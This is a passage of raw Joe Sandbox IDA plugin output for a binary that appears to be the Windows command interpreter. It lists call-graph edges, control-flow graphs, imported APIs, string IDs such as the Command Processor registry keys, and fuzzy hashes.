18881 7ff706ed778c 166 API calls 18879->18881 18880->18892 19055 7ff706ed76e0 18880->19055 18885 7ff706ed7afb 18881->18885 18887 7ff706ec3448 166 API calls 18882->18887 18897 7ff706ed79e7 18882->18897 18883->18879 18889 7ff706ec34a0 166 API calls 18884->18889 18884->18892 18885->18880 18890 7ff706ec3448 166 API calls 18885->18890 18886->18869 18886->18870 18886->18873 18886->18875 18886->18878 18886->18880 18886->18892 18893 7ff706ec3448 166 API calls 18886->18893 18895 7ff706ed778c 166 API calls 18886->18895 18887->18897 18894 7ff706ed7a23 18889->18894 18890->18880 18891 7ff706ec3448 166 API calls 18891->18892 18892->18782 18893->18886 18896 7ff706ed778c 166 API calls 18894->18896 18895->18886 18896->18897 19051 7ff706ed7730 18897->19051 18898->18891 18900 7ff706edc775 18899->18900 18906 7ff706edc7ab 18899->18906 18901 7ff706ebcd90 166 API calls 18900->18901 18902 7ff706edc781 18901->18902 18903 7ff706edc8d4 18902->18903 18904 7ff706ebb0d8 194 API calls 18902->18904 18903->18782 18904->18903 18905 7ff706ebb6b0 170 API calls 18905->18906 18906->18902 18906->18903 18906->18905 18907 7ff706ebb038 _dup2 18906->18907 18908 7ff706ebd208 _close 18906->18908 18907->18906 18908->18906 18910 7ff706edd635 18909->18910 18911 7ff706edd63d 18909->18911 18914 7ff706edd672 longjmp 18910->18914 18915 7ff706ecc9da 18910->18915 18912 7ff706edd658 18911->18912 18913 7ff706edd64a 18911->18913 18912->18910 18917 7ff706eb3278 166 API calls 18912->18917 18916 7ff706eb3278 166 API calls 18913->18916 18914->18915 18915->18775 18915->18777 18916->18910 18917->18910 18920 7ff706ebe60f 18919->18920 18921 7ff706ecccca longjmp 18920->18921 18977 7ff706ebef40 18920->18977 18925 7ff706ebe637 18921->18925 18923 7ff706ebe626 18923->18921 18923->18925 18924 7ff706ec3448 166 API calls 18926 7ff706ecccfe 18924->18926 18925->18924 18927 7ff706ebe65f 18925->18927 18926->18856 18927->18856 18929 7ff706ebd267 18928->18929 18934 7ff706ebd2d3 18928->18934 18930 7ff706ebd284 _wcsicmp 18929->18930 18936 
7ff706ebd2a6 18929->18936 18932 7ff706ebd32b 18930->18932 18930->18936 18931 7ff706ebe600 473 API calls 18931->18934 18935 7ff706ebe600 473 API calls 18932->18935 18932->18936 18933 7ff706ebd316 18933->18859 18933->18865 18934->18929 18934->18931 18937 7ff706ebd305 18934->18937 18935->18932 18936->18933 18938 7ff706ebef40 472 API calls 18936->18938 18937->18933 18939 7ff706ebe600 473 API calls 18937->18939 18944 7ff706ebedf8 18938->18944 18939->18929 18940 7ff706ecd0a2 longjmp 18941 7ff706ecd0c5 18940->18941 18942 7ff706ec3448 166 API calls 18941->18942 18943 7ff706ecd0d4 18942->18943 18944->18940 18944->18941 18945 7ff706ebee68 18944->18945 18946 7ff706ebeeb1 18944->18946 18948 7ff706ebef40 472 API calls 18945->18948 18949 7ff706ebe600 473 API calls 18946->18949 18954 7ff706ebeec2 18946->18954 18958 7ff706ebeece 18946->18958 18947 7ff706ebcd90 166 API calls 18950 7ff706ebeee7 18947->18950 18948->18933 18949->18946 18951 7ff706ebef31 18950->18951 18952 7ff706ebeeef 18950->18952 18953 7ff706ede91c 198 API calls 18951->18953 18955 7ff706ebe600 473 API calls 18952->18955 18956 7ff706ebef36 18953->18956 18957 7ff706ebef40 472 API calls 18954->18957 18955->18933 18956->18940 18957->18958 18958->18933 18958->18947 18974 7ff706edd419 18959->18974 18960 7ff706eccadf 18961 7ff706edd576 18962 7ff706edd592 18961->18962 18972 7ff706edd555 18961->18972 18963 7ff706ec3448 166 API calls 18962->18963 18966 7ff706edd5a5 18963->18966 18964 7ff706edd5c4 18968 7ff706ec3448 166 API calls 18964->18968 18969 7ff706edd5ba 18966->18969 18971 7ff706ec3448 166 API calls 18966->18971 18967 7ff706edd541 18967->18962 18970 7ff706edd546 18967->18970 18968->18960 19021 7ff706edd36c 18969->19021 18970->18964 18970->18972 18971->18969 19028 7ff706edd31c 18972->19028 18974->18960 18974->18961 18974->18962 18974->18964 18974->18967 18974->18972 18975 7ff706edd3fc 166 API calls 18974->18975 18976 7ff706ec3448 166 API calls 18974->18976 18975->18974 18976->18974 18978 7ff706ebef71 18977->18978 18979 
7ff706ecd1f3 18978->18979 18980 7ff706ebf130 18978->18980 18986 7ff706ebef87 18978->18986 18979->18923 18981 7ff706ec3448 166 API calls 18980->18981 19007 7ff706ebf10e 18980->19007 19019 7ff706ebf046 18981->19019 18982 7ff706ebf433 18984 7ff706ebf8c0 456 API calls 18982->18984 18983 7ff706ebf438 18988 7ff706ebf860 456 API calls 18983->18988 18983->19019 18984->18983 18985 7ff706ebeff2 iswspace 18985->18986 18987 7ff706ebf01f wcschr 18985->18987 18986->18979 18986->18982 18986->18983 18986->18985 18986->18987 18986->19019 18987->19019 18988->19019 18989 7ff706ebf558 iswspace 18992 7ff706ebf6cd wcschr 18989->18992 18989->19019 18990 7ff706ebf0c4 iswdigit 18991 7ff706ebf5aa 18990->18991 18999 7ff706ebf0ea 18990->18999 18994 7ff706ebf860 456 API calls 18991->18994 18992->19019 18993 7ff706ebf471 18995 7ff706ebf860 456 API calls 18993->18995 19005 7ff706ebf4af 18994->19005 18995->18999 18996 7ff706ebf1b7 iswspace 18996->18990 18998 7ff706ebf1ce wcschr 18996->18998 18997 7ff706ebf1fc iswdigit 18997->19019 18998->18990 18998->18997 19000 7ff706ebf860 456 API calls 18999->19000 18999->19007 19003 7ff706ebf4a6 19000->19003 19001 7ff706ebf8c0 456 API calls 19001->19019 19002 7ff706ebf370 19004 7ff706eb3278 166 API calls 19002->19004 19002->19007 19003->19005 19008 7ff706ebf860 456 API calls 19003->19008 19004->18979 19006 7ff706ebf860 456 API calls 19005->19006 19005->19007 19009 7ff706ebf632 iswspace 19006->19009 19007->18923 19008->19005 19009->19005 19010 7ff706ebf648 wcschr 19009->19010 19010->19005 19012 7ff706ebf65f iswdigit 19010->19012 19011 7ff706ebf32f iswspace 19011->19002 19014 7ff706ebf342 wcschr 19011->19014 19012->19007 19015 7ff706ebf67b 19012->19015 19013 7ff706ebf2b8 iswdigit 19013->19019 19014->19002 19014->19013 19016 7ff706ebf860 456 API calls 19015->19016 19016->19007 19017 7ff706ebf3d2 iswspace 19018 7ff706ebf3e9 wcschr 19017->19018 19017->19019 19018->19019 19019->18989 19019->18990 19019->18991 19019->18993 19019->18996 19019->18997 19019->18999 
19019->19001 19019->19002 19019->19011 19019->19013 19019->19017 19020 7ff706ebf860 456 API calls 19019->19020 19020->19019 19022 7ff706edd381 19021->19022 19023 7ff706edd3d8 19021->19023 19024 7ff706ec34a0 166 API calls 19022->19024 19027 7ff706edd390 19024->19027 19025 7ff706ec3448 166 API calls 19025->19027 19026 7ff706ec34a0 166 API calls 19026->19027 19027->19023 19027->19025 19027->19026 19027->19027 19029 7ff706ec3448 166 API calls 19028->19029 19030 7ff706edd33b 19029->19030 19031 7ff706edd36c 166 API calls 19030->19031 19032 7ff706edd343 19031->19032 19033 7ff706edd3fc 166 API calls 19032->19033 19050 7ff706edd34e 19033->19050 19034 7ff706edd5c2 19034->18960 19035 7ff706edd576 19036 7ff706edd592 19035->19036 19047 7ff706edd555 19035->19047 19037 7ff706ec3448 166 API calls 19036->19037 19040 7ff706edd5a5 19037->19040 19038 7ff706edd5c4 19042 7ff706ec3448 166 API calls 19038->19042 19039 7ff706edd31c 166 API calls 19039->19034 19043 7ff706edd5ba 19040->19043 19046 7ff706ec3448 166 API calls 19040->19046 19041 7ff706edd541 19041->19036 19044 7ff706edd546 19041->19044 19042->19034 19048 7ff706edd36c 166 API calls 19043->19048 19044->19038 19044->19047 19045 7ff706ec3448 166 API calls 19045->19050 19046->19043 19047->19039 19048->19034 19049 7ff706edd3fc 166 API calls 19049->19050 19050->19034 19050->19035 19050->19036 19050->19038 19050->19041 19050->19045 19050->19047 19050->19049 19053 7ff706ed773c 19051->19053 19052 7ff706ed777d 19052->18892 19053->19052 19054 7ff706ec3448 166 API calls 19053->19054 19054->19053 19056 7ff706ed778c 166 API calls 19055->19056 19057 7ff706ed76fb 19056->19057 19058 7ff706ed771c 19057->19058 19059 7ff706ec3448 166 API calls 19057->19059 19058->18892 19060 7ff706ed7711 19059->19060 19061 7ff706ed778c 166 API calls 19060->19061 19061->19058 19063 7ff706ebc486 19062->19063 19064 7ff706ebc4c9 19062->19064 19065 7ff706ebc48e wcschr 19063->19065 19069 7ff706ebc161 19063->19069 19067 7ff706ebff70 2 API calls 19064->19067 19064->19069 
19066 7ff706ebc4ef 19065->19066 19065->19069 19068 7ff706ebcd90 166 API calls 19066->19068 19067->19069 19075 7ff706ebc4f9 19068->19075 19069->18432 19069->18456 19070 7ff706ebc5bd 19071 7ff706ebc541 19070->19071 19074 7ff706ebb6b0 170 API calls 19070->19074 19071->19069 19073 7ff706ebff70 2 API calls 19071->19073 19072 7ff706ebd840 178 API calls 19072->19075 19073->19069 19074->19071 19075->19069 19075->19070 19075->19071 19075->19072 19077 7ff706ebb018 19076->19077 19077->18493 19078->18493 19080 7ff706ec3bfe 19079->19080 19082 7ff706ec3bcf 19079->19082 19080->18544 19081 7ff706ec3bdc wcschr 19081->19080 19081->19082 19082->19080 19082->19081 19084 7ff706ec8f80 7 API calls 19083->19084 19085 7ff706ec296b 19084->19085 19085->18544 19087 7ff706ec2f2a 19086->19087 19088 7ff706ec2f97 19086->19088 19090 7ff706ec823c 10 API calls 19087->19090 19088->19087 19089 7ff706ec2f9c wcschr 19088->19089 19091 7ff706ec2fb6 wcschr 19089->19091 19098 7ff706ec2f5a 19089->19098 19092 7ff706ec2f56 19090->19092 19091->19087 19091->19098 19093 7ff706ec3a0c 2 API calls 19092->19093 19092->19098 19095 7ff706ec2fe0 19093->19095 19094 7ff706ec8f80 7 API calls 19096 7ff706ec2f83 19094->19096 19097 7ff706ec2fe9 wcsrchr 19095->19097 19095->19098 19096->18544 19097->19098 19098->19094 19099 7ff706ece4ec 19098->19099 19101 7ff706ed4621 19100->19101 19102 7ff706eb72de 19100->19102 19104 7ff706ed47e0 19101->19104 19105 7ff706ed447b longjmp 19101->19105 19108 7ff706ed4639 19101->19108 19117 7ff706ed475e 19101->19117 19103 7ff706eb72eb 19102->19103 19111 7ff706ed4530 19102->19111 19112 7ff706ed4467 19102->19112 19161 7ff706eb7348 19103->19161 19107 7ff706eb7348 168 API calls 19104->19107 19109 7ff706ed4492 19105->19109 19160 7ff706ed4524 19107->19160 19113 7ff706ed4695 19108->19113 19114 7ff706ed463e 19108->19114 19115 7ff706eb7348 168 API calls 19109->19115 19116 7ff706eb7348 168 API calls 19111->19116 19112->19103 19112->19109 19119 7ff706ed4475 19112->19119 19124 7ff706eb73d4 168 API calls 
19113->19124 19114->19105 19125 7ff706ed4654 19114->19125 19132 7ff706ed44a8 19115->19132 19127 7ff706ed4549 19116->19127 19120 7ff706eb7348 168 API calls 19117->19120 19118 7ff706eb7315 19176 7ff706eb73d4 19118->19176 19119->19105 19119->19113 19120->19104 19121 7ff706eb7348 168 API calls 19121->19118 19122 7ff706eb72b0 168 API calls 19128 7ff706ed480e 19122->19128 19141 7ff706ed469a 19124->19141 19133 7ff706eb7348 168 API calls 19125->19133 19126 7ff706ed45b2 19129 7ff706eb7348 168 API calls 19126->19129 19127->19126 19148 7ff706eb7348 168 API calls 19127->19148 19149 7ff706ed455e 19127->19149 19128->18586 19131 7ff706ed45c7 19129->19131 19130 7ff706eb72b0 168 API calls 19138 7ff706ed4738 19130->19138 19135 7ff706eb7348 168 API calls 19131->19135 19136 7ff706eb7348 168 API calls 19132->19136 19144 7ff706ed44e2 19132->19144 19139 7ff706eb7323 19133->19139 19134 7ff706eb7348 168 API calls 19134->19126 19143 7ff706ed45db 19135->19143 19136->19144 19137 7ff706eb72b0 168 API calls 19145 7ff706ed44f1 19137->19145 19142 7ff706eb7348 168 API calls 19138->19142 19139->18586 19140 7ff706ed46e1 19140->19130 19141->19140 19150 7ff706ed46c7 19141->19150 19151 7ff706ed46ea 19141->19151 19142->19160 19146 7ff706eb7348 168 API calls 19143->19146 19144->19137 19147 7ff706eb72b0 168 API calls 19145->19147 19152 7ff706ed45ec 19146->19152 19153 7ff706ed4503 19147->19153 19148->19149 19149->19126 19149->19134 19150->19140 19157 7ff706eb7348 168 API calls 19150->19157 19154 7ff706eb7348 168 API calls 19151->19154 19155 7ff706eb7348 168 API calls 19152->19155 19153->19139 19156 7ff706eb7348 168 API calls 19153->19156 19154->19140 19158 7ff706ed4600 19155->19158 19156->19160 19157->19140 19159 7ff706eb7348 168 API calls 19158->19159 19159->19160 19160->19122 19160->19139 19163 7ff706eb735d 19161->19163 19162 7ff706eb3278 166 API calls 19164 7ff706ed4820 longjmp 19162->19164 19163->19162 19163->19163 19165 7ff706ed4838 19163->19165 19175 7ff706eb73ab 19163->19175 19164->19165 19166 
7ff706eb3278 166 API calls 19165->19166 19167 7ff706ed4844 longjmp 19166->19167 19168 7ff706ed485a 19167->19168 19169 7ff706eb7348 166 API calls 19168->19169 19170 7ff706ed487b 19169->19170 19171 7ff706eb7348 166 API calls 19170->19171 19172 7ff706ed48ad 19171->19172 19173 7ff706eb7348 166 API calls 19172->19173 19174 7ff706eb72ff 19173->19174 19174->19118 19174->19121 19177 7ff706eb7401 19176->19177 19178 7ff706ed485a 19176->19178 19177->19139 19179 7ff706eb7348 168 API calls 19178->19179 19180 7ff706ed487b 19179->19180 19181 7ff706eb7348 168 API calls 19180->19181 19182 7ff706ed48ad 19181->19182 19183 7ff706eb7348 168 API calls 19182->19183 19184 7ff706ed48be 19183->19184 19184->19139 16773 7ff706ec8d80 16774 7ff706ec8da4 16773->16774 16775 7ff706ec8db6 16774->16775 16776 7ff706ec8dbf Sleep 16774->16776 16777 7ff706ec8ddb _amsg_exit 16775->16777 16783 7ff706ec8de7 16775->16783 16776->16774 16777->16783 16778 7ff706ec8e56 _initterm 16780 7ff706ec8e73 _IsNonwritableInCurrentImage 16778->16780 16779 7ff706ec8e3c 16787 7ff706ec37d8 GetCurrentThreadId OpenThread 16780->16787 16783->16778 16783->16779 16783->16780 16820 7ff706ec04f4 16787->16820 16789 7ff706ec3839 HeapSetInformation RegOpenKeyExW 16790 7ff706ece9f8 RegQueryValueExW RegCloseKey 16789->16790 16791 7ff706ec388d 16789->16791 16793 7ff706ecea41 GetThreadLocale 16790->16793 16792 7ff706ec5920 VirtualQuery VirtualQuery 16791->16792 16794 7ff706ec38ab GetConsoleOutputCP GetCPInfo 16792->16794 16807 7ff706ec3919 16793->16807 16794->16793 16795 7ff706ec38f1 memset 16794->16795 16795->16807 16796 7ff706ec4d5c 391 API calls 16796->16807 16797 7ff706ec3948 _setjmp 16797->16807 16798 7ff706eceb27 _setjmp 16798->16807 16799 7ff706ec4c1c 166 API calls 16799->16807 16800 7ff706ed8530 370 API calls 16800->16807 16801 7ff706eb3240 166 API calls 16801->16807 16802 7ff706ec01b8 6 API calls 16802->16807 16803 7ff706ebdf60 481 API calls 16803->16807 16804 7ff706eceb71 _setmode 16804->16807 16805 7ff706ec86f0 182 API calls 
16805->16807 16806 7ff706ec0580 12 API calls 16808 7ff706ec398b GetConsoleOutputCP GetCPInfo 16806->16808 16807->16790 16807->16796 16807->16797 16807->16798 16807->16799 16807->16800 16807->16801 16807->16802 16807->16803 16807->16804 16807->16805 16807->16806 16809 7ff706ec58e4 EnterCriticalSection LeaveCriticalSection 16807->16809 16811 7ff706ebbe00 647 API calls 16807->16811 16812 7ff706ec58e4 EnterCriticalSection LeaveCriticalSection 16807->16812 16810 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16808->16810 16809->16807 16810->16807 16811->16807 16813 7ff706ecebbe GetConsoleOutputCP GetCPInfo 16812->16813 16814 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16813->16814 16815 7ff706ecebe6 16814->16815 16816 7ff706ebbe00 647 API calls 16815->16816 16817 7ff706ec0580 12 API calls 16815->16817 16816->16815 16818 7ff706ecebfc GetConsoleOutputCP GetCPInfo 16817->16818 16819 7ff706ec04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16818->16819 16819->16807 16821 7ff706ec0504 16820->16821 16822 7ff706ec051e GetModuleHandleW 16821->16822 16823 7ff706ec054d GetProcAddress 16821->16823 16824 7ff706ec056c SetThreadLocale 16821->16824 16822->16821 16823->16821
APIs
Strings
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
• String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
• API String ID: 3305344409-4288247545
• Opcode ID: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
• Instruction ID: 9bfec8900945ec7118506fc4e3bb8b18e404af2f69f167a43fa234661bd7550b
• Opcode Fuzzy Hash: a96582028ec0f2fe5c172ab386b274325035dd19617a6b7700d430aa1b709d90
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14429125A0878285EB64AB219C342BBE7A1FF85BA4FC44234DD1E4B7D5DF3DE5468320

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocProcessiswspacememsettowlowerwcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :$:$:$:ON$OFF
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 972821348-467788257
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d89b8ef5a57032106b00a460d635cd2fedc4392d70b9e8c128c9239153785143
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9622B225A0874386EB24BF259C352BBE691FF55B94FC89135CA0E4B398DF3CA8458770

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
Similarity
• API ID: InfoLocale$DefaultUsersetlocale
• String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
• API String ID: 1351325837-2236139042

Control-flow Graph

Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
Similarity
• API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
• String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
• API String ID: 388421343-2905461000

Control-flow Graph

Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
Similarity
• API ID: QueryValue$CloseOpensrandtime
• String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
• API String ID: 145004033-3846321370

Control-flow Graph (graph image not reproduced): function at 7ff706ec37d8
APIs: GetCurrentThreadId, OpenThread, HeapSetInformation, RegOpenKeyExW, RegQueryValueExW, RegCloseKey, GetConsoleOutputCP, GetCPInfo, GetThreadLocale, memset, _setjmp, _setmode
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2624720099-1920437939

Control-flow Graph (graph image not reproduced): function at 7ff706ec823c
APIs: FindFirstFileExW, GetLastError, FindNextFileW, FindClose, GetProcessHeap, HeapAlloc, HeapReAlloc
Memory Dump Source
• Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorFileFindFirstLast
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 873889042-0

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                                          control_flow_graph 1142 7ff706ec2978-7ff706ec29b6 1143 7ff706ec29b9-7ff706ec29c1 1142->1143 1143->1143 1144 7ff706ec29c3-7ff706ec29c5 1143->1144 1145 7ff706ece441 1144->1145 1146 7ff706ec29cb-7ff706ec29cf 1144->1146 1147 7ff706ec29d2-7ff706ec29da 1146->1147 1148 7ff706ec2a1e-7ff706ec2a3e FindFirstFileW 1147->1148 1149 7ff706ec29dc-7ff706ec29e1 1147->1149 1151 7ff706ece435-7ff706ece439 1148->1151 1152 7ff706ec2a44-7ff706ec2a5c FindClose 1148->1152 1149->1148 1150 7ff706ec29e3-7ff706ec29eb 1149->1150 1150->1147 1153 7ff706ec29ed-7ff706ec2a1c call 7ff706ec8f80 1150->1153 1151->1145 1154 7ff706ec2a62-7ff706ec2a6e 1152->1154 1155 7ff706ec2ae3-7ff706ec2ae5 1152->1155 1157 7ff706ec2a70-7ff706ec2a78 1154->1157 1158 7ff706ece3f7-7ff706ece3ff 1155->1158 1159 7ff706ec2aeb-7ff706ec2b10 _wcsnicmp 1155->1159 1157->1157 1161 7ff706ec2a7a-7ff706ec2a8d 1157->1161 1159->1154 1162 7ff706ec2b16-7ff706ece3f1 _wcsicmp 1159->1162 1161->1145 1164 7ff706ec2a93-7ff706ec2a97 1161->1164 1162->1154 1162->1158 1165 7ff706ece404-7ff706ece407 1164->1165 1166 7ff706ec2a9d-7ff706ec2ade memmove call 7ff706ec13e0 1164->1166 1167 7ff706ece40b-7ff706ece413 1165->1167 1166->1150 1167->1167 1169 7ff706ece415-7ff706ece42b memmove 1167->1169 1169->1151
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284371657.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EED000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284448003.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000009.00000002.1284514965.00007FF706F09000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_7ff706eb0000_alpha.jbxd

                                                                                                                                                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A28
                                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A66
                                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A7D
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4A9A
                                                                                                                                                                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF706EC49F1), ref: 00007FF706EC4AA2
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000009.00000002.1284341191.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
• Associated: 00000009.00000002.1284320265.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmp
